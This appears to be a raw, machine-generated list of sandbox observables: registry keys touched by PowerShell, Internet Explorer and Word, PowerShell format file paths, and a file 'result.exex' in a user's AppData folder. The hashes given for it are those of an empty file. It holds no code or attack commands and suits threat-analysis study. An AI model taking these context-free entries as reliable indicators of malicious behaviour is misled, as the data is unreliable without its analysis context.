HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP HKEY_LOCAL_MACHINE File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER File STD_INPUT_HANDLE File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File conout$ File users\aetadzjz\appdata\roaming\result.exex users\aetadzjz\appdata\roaming\result.exex c:\ c:\users\aetadzjz\appdata\roaming\result.exex exex WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase ApplicationBase ApplicationBase WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion StackVersion StackVersion WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase ApplicationBase ApplicationBase ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB PipelineMaxStackSizeMB File STD_INPUT_HANDLE File STD_ERROR_HANDLE File STD_OUTPUT_HANDLE File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File conout$ File users\aetadzjz\appdata\roaming\result.exex users\aetadzjz\appdata\roaming\result.exex c:\ c:\users\aetadzjz\appdata\roaming\result.exex exex MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 WinRegistryKey Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word\Resiliency HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word\Resiliency HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Word\Resiliency HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER mq* |5, File STD_INPUT_HANDLE File windows\system32\windowspowershell\v1.0\getevent.types.ps1xml windows\system32\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\types.ps1xml windows\system32\windowspowershell\v1.0\types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File conout$ File users\aetadzjz\appdata\roaming\result.exex users\aetadzjz\appdata\roaming\result.exex c:\ c:\users\aetadzjz\appdata\roaming\result.exex exex WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows 